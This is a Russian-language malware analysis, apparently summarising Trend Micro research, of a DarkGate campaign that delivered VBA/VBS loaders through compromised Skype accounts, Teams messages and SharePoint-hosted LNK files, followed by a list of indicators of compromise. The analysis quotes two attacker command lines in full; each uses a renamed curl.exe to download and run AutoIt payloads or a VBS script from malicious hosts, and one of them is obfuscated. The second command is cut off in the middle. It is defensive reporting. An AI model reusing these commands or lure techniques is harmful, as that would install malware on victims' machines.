С июля по сентябрь Trend Micro наблюдали, как кампания DarkGate использовала платформы обмена мгновенными сообщениями для доставки жертвам скрипта-загрузчика VBA. Этот скрипт загружал и выполнял полезную нагрузку второго этапа, состоящую из скрипта AutoIT, содержащего код вредоносной программы DarkGate.
DarkGate
Неясно, каким образом были скомпрометированы учетные записи приложений для обмена мгновенными сообщениями, однако предполагается, что это произошло либо в результате утечки учетных данных, доступных на подпольных форумах, либо в результате предыдущей компрометации материнской организации.
В последние пару лет DarkGate не проявлял особой активности. Однако в этом году Trend Micro наблюдали несколько развернутых кампаний, о которых сообщили Truesec и MalwareBytes. При внимательном наблюдении за этой кампанией мы отметили, что большинство атак DarkGate было обнаружено в американском регионе, за которым следуют атаки в Азии, на Ближнем Востоке и в Африке.
В исследованном Trend Micro примере угроза использовала доверительные отношения между двумя организациями, чтобы обманом заставить получателя выполнить прикрепленный VBA-скрипт. Доступ к учетной записи Skype жертвы позволил злоумышленнику перехватить существующий поток сообщений и изменить именование файлов в соответствии с контекстом истории чата.
Жертвы получали сообщение со взломанной учетной записи Skype, в котором содержался обманный VBS-скрипт с именем файла, имеющим следующий формат: <filename.pdf> www.skype[.]vbs. Пробелы в имени файла заставляют пользователя поверить, что это документ в формате .PDF, а реальный формат - www.skype[.]vbs. В рассматриваемом примере получатель знал отправителя как человека, принадлежащего к доверенному внешнему поставщику.
VBA-скрипт после выполнения жертвой начинает с создания новой папки с именем "<Random Char >", затем копирует легитимный файл curl.exe с тем же именем в директорию, созданную как <Random Char>.exe. Затем скрипт загружает исполняемый файл AutoIt3 и скрипт .AU3 с внешнего сервера, на котором размещены эти файлы.
Команда curl использовалась для получения легитимного приложения AutoIt и связанного с ним вредоносного файла fIKXNA.au3 (.au3 представляет собой файл сценария AutoIt Version 3). Команда Curl выполнялась через cmd.exe со следующими параметрами для получения двух файлов с удаленного хостинг-сервера:
C:\Windows\System32\cmd.exe" /c mkdir c:\zohn & cd /d c:\zohn & copy C:\windows\system32\curl.exe zohn.exe & zohn -o Autoit3. exe hxxp://reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3В другом примере угроза наблюдалась при отправке ссылки через сообщение Microsoft Teams. В этом случае система организации позволяла жертве получать сообщения от внешних пользователей, в результате чего она становилась потенциальной мишенью для спама. Исследователи из компании Truesec в начале сентября задокументировали аналогичную технику DarkGate. В то время как в программе Skype VBS-файл маскировался под PDF-документ, в варианте компрометации Teams злоумышленники скрывали файл .LNK. Более того, образец, использовавшийся для взлома Teams, был получен от неизвестного внешнего отправителя.
Trend Micro также наблюдали третичный способ доставки VBA-скрипта, при котором файл .LNK поступает в сжатом виде с сайта SharePoint, принадлежащего злоумышленникам. Жертву заманивают перейти на указанный сайт SharePoint и загрузить файл с именем "Significant company changes September.zip".
Файл .ZIP содержит следующие .LNK-файлы, выдаваемые за PDF-документ:
- Company_Transformations.pdf.lnk
- Revamped_Organizational_Structure.pdf.lnk
- Position_Guidelines.pdf.lnk
- Fresh_Mission_and_Core_Values.pdf.lnk
- Employees_Affected_by_Transition.pdf.lnk
При использовании условного выполнения последующая команда будет выполняться только в случае неудачи предыдущей команды. LNK-файл содержит следующую команду:
"C:\Windows\System32\cmd.exe" /c hm3 || EChO hm3 & PIN "G" hm3 || cURl h "t "t "p":"//"1"85.39".1"8".17"0"/m"/d "2 "J" -o C:\Users\<USER>\AppData\Local\Temp\hm3. vbs & PIN "G" -n 4 hm3 || c "sCR "i "Pt" C:\Users\<USER>\AppData\Local\Temp\hm3.vbs & e "XI "t 'HlnLEG=OcCQmmcmПосле успешного выполнения загружается и выполняется сценарий VBA-загрузчика (hm3.vbs). Сценарий VBA скопирует и переименует файл curl.exe из каталога System32 в "<Random Char>.exe", а команда curl будет использована для извлечения файла Autoit3.exe и связанного с ним вредоносного кода DarkGate.
Indicators of Compromise
IPv4
- 5.188.87.58
IPv4 Port Combinations
- 5.188.87.58:2351
Domains
- coocooncookiedpo.com
- Drkgatevservicceoffice.net
- marketisportsstumi.win
- msteamseyeappstore.com
- onlysportsfitnessam.com
- reactervnamnat.com
- wmnwserviceadsmark.com
URLs
- http://corialopolova.com/vHdLtiAzZYCsHszzP118.bin
SHA1
- 001e4eacb4dd47fa9f49ff20b5a83d3542ad6ba2
- 0e7b5d0797c369dd1185612f92991f41b1a7bfa2
- 1f550b3b5f739b74cc5fd1659d63b4a22d53a3fc
- 3229a36f803346c513dbb5d6fe911d4cb2f4dab1
- 381bf78b64fcdf4e21e6e927edd924ba01fdf03d
- 3cbbdfc83c4ef05c0f5c37c99467958051f4a0e1
- 42fe509513cd0c026559d3daf491a99914fcc45b
- 45a89d03016695ad87304a0dfd04648e8dfeac8f
- 4c24d0fc57633d2befaac9ac5706cbc163df747c
- 4ed69ed4282f5641b5425a9fca4374a17aecb160
- 549cb39cea44cf8ca7d781cd4588e9258bdff2a1
- 6585e15d53501c7f713010a0621b99e9097064ff
- 7d3f4c9a43827bff3303bf73ddbb694f02cc7ecc
- 924b60bd15df000296fc2b9f179df9635ae5bfed
- 9253eed158079b5323d6f030e925d35d47756c10
- 93cb5837a145d688982b95fab297ebdb9f3016bc
- a3516b2bb5c60b23b4b41f64e32d57b5b4c33574
- a85664a8b304904e7cd1c407d012d3575eeb2354
- ad1667eaf03d3989e5044faa83f6bb95a023e269
- cec7429d24c306ba5ae8344be831770dfe680da4
- d40c7afee0dd9877bbe894bc9f357b50e002b7e2
- d9a2ae9f5cffba0d969ef8edbbf59dc50586df00
- e108fe723265d885a51e9b6125d151b32e23a949
- e47086abe1346c40f58d58343367fd72165ddecd
- e6347dfdaf3f1e26d55fc0ed3ebf09b8e8d60b3f
- e6e4c7c2c2c8e370a0ec6ddb5d998c150dcb9f10
- f3a740ea4e04d970c37d82617f05b0f209f72789
- f7b9569a536514e70b6640d74268121162326065